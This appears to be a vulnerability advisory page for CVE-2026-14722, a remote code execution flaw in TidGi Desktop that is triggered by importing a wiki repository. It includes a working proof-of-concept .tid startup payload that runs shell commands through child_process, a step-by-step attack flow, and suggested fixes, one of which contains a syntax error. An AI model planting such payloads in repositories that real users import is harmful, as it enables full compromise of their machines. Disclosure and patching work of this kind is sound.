TidGi Desktop, Remote Code Execution (RCE), CVE-2026-14722 (Critical) -DC-Jul2026-985

Listen to this Post

How CVE-2026-14722 Works

TidGi Desktop through 0.13.0 contains a critical remote code execution vulnerability exploitable via a single Git repository import. The vulnerability leverages TiddlyWiki’s module system, which automatically discovers and executes JavaScript code embedded in `.tid` files placed in the wiki’s `tiddlers/` directory.
Root Cause 1 — `.tid` Files Auto-Loaded Before Module Processing
When TidGi boots a wiki workspace, `loadWikiTiddlers` reads all `.tid` files from the filesystem and adds them to the wiki store via wiki.addTiddlers(). The auto-loading occurs in src/services/wiki/wikiWorker/loadWikiTiddlersWithSubWikis.ts:59-92.
Root Cause 2 — Automatic Module Registration via `module-type` Field
In node_modules/tiddlywiki/boot/boot.js:2564-2565, `defineTiddlerModules()` iterates all tiddlers in the store. Any tiddler with a `module-type` field is passed to $tw.modules.define(), registering it as an executable module.
Root Cause 3 — Automatic Startup Execution with Full Node.js Access
In node_modules/tiddlywiki/boot/boot.js:2572-2634, all registered modules of type `”startup”` are collected and their `exports.startup()` function is called during the boot sequence. When no `platforms` restriction is set, `doesTaskMatchPlatform()` returns true, and the startup function executes with full Node.js `require()` access in the Wiki Worker process.

Complete Boot Sequence (TiddlyWiki 5.4.0)

`$tw.boot.startup()` → `initStartup()` → `loadStartup()` → `loadTiddlersNode()` → `$tw.loadWikiTiddlers(wikiPath)` → `wiki.addTiddlers()` (loads `.tid` files) → `execStartup()` → `defineShadowModules()` → `defineTiddlerModules()` (registers attacker’s module) → `forEachModuleOfType(“startup”, …)` (collects startup modules) → `executeNextStartupTask()` → `task.startup()` (executes).
The full chain was verified on macOS with TiddlyWiki 5.4.0 and Node.js v26 — `require(‘child_process’).execSync()` successfully executed arbitrary shell commands.

DailyCVE Form:

Platform: TidGi Desktop
Version: 0.13.0
Vulnerability: RCE (Code Injection)
Severity: Critical (CVSS 7.3 High)
Date: 2026-07-05

Prediction: 2026-08-15

What Undercode Say:

Analytics:

  • Attack Vector: Remote
  • User Interaction: 1 click
  • Privileges: None required
  • Impact: Full system compromise
    Verify TiddlyWiki version
    node -e "console.log(require('tiddlywiki/package.json').version)"
    Expected output: 5.4.0 (vulnerable)
    Check for vulnerable module registration code
    grep -n "defineTiddlerModules" node_modules/tiddlywiki/boot/boot.js
    Lines 1514-1534 contain the vulnerable registration logic
    
    // Malicious .tid file payload
    $:/plugins/poc/startup.js
    type: application/javascript
    module-type: startup
    exports.startup = function() {
    require('child_process').execSync('touch /tmp/TidGi-RCE-PoC.txt');
    console.log('STARTUP_EXECUTED');
    };
    

Exploit:

Complete Attack Flow:

┌──────────────────────────────────────────────────────────────┐
│ Step 1: Attacker creates a malicious TiddlyWiki repository │
├──────────────────────────────────────────────────────────────┤
│ tiddlers/$__plugins__poc__startup.js.tid: │
│ │
│ $:/plugins/poc/startup.js │
│ type: application/javascript │
│ module-type: startup │
│ │
│ exports.startup = function() { │
│ require('child_process').execSync('calc'); │
│ }; │
│ │
│ + tiddlywiki.info + any other wiki files │
└──────────────────────────────────────────────────────────────┘
↓
┌──────────────────────────────────────────────────────────────┐
│ Step 2: Victim imports the repository into TidGi Desktop │
├──────────────────────────────────────────────────────────────┤
│ Add Workspace → Clone Git Repository / Open Local Folder │
│ → TidGi boots the wiki │
└──────────────────────────────────────────────────────────────┘
↓
┌──────────────────────────────────────────────────────────────┐
│ Step 3: RCE — startup module auto-executes in Node.js │
├──────────────────────────────────────────────────────────────┤
│ loadWikiTiddlers loads .tid file → wiki.addTiddlers() │
│ boot.startup() → execStartup() │
│ defineTiddlerModules() → $tw.modules.define("startup",..) │
│ executeNextStartupTask() → exports.startup() │
│ → require('child_process').execSync('...') executes │
└──────────────────────────────────────────────────────────────┘

Verification Output:

$ node -e "
const \$tw = require('tiddlywiki/boot/boot.js').TiddlyWiki();
\$tw.boot.argv = ['/tmp/evil-wiki'];
\$tw.boot.startup();
"
STARTUP_EXECUTED
$ ls -la /tmp/TidGi-RCE-PoC.txt
-rw-r--r-- 1 user wheel 0 Jun 3 00:01 /tmp/TidGi-RCE-PoC.txt

Protection:

Fix 1: Disallow `module-type` on User Tiddlers

// In defineTiddlerModules() or equivalent
if (tiddler.hasField("module-type") && !tiddler.fields..startsWith("$:/")) {
// User tiddler — silently drop module-type field
return;
}

Fix 2: Sandbox User Modules

// Replace direct require access with a restricted API surface
const vm = require('vm');
const sandbox = { console, $tw, Buffer };
vm.runInNewContext(moduleCode, sandbox, { timeout: 5000 });

Fix 3: Whitelist Allowed `module-type` Values

const ALLOWED_USER_MODULE_TYPES = ['widget', 'macro', 'filter', 'parser'];
if (!ALLOWED_USER_MODULE_TYPES.includes(tiddler.fields['module-type'])) {
return; // Block startup, library, saver, etc.
}

Mitigation: Do not import untrusted TiddlyWiki repositories. Review any `.tid` files in the `tiddlers/` directory for `module-type: startup` before importing.

Impact:

| Capability | Status | Details |

||–||

| Remote Code Execution | ✅ Full Node.js access | `require(‘child_process’)` available |
| Arbitrary File Read | ✅ | `require(‘fs’).readFileSync()` |
| Arbitrary File Write | ✅ | `require(‘fs’).writeFileSync()` |
| Reverse Shell | ✅ | Node.js `net` module |
| Persistence | ✅ | Write to startup scripts, LaunchAgents, crontab |
| User Interaction | 1 click | Import repository |
| Cross-Platform | ✅ | Windows, macOS, Linux |

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top